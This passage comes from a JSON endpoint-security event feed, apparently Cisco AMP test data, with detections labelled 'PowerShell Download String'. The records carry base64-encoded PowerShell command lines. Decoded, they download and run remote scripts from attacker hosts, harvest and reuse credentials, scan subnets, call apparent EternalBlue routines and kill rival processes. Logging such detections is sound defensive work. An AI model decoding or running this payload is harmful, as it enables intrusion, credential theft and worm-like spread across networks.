FsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0Aa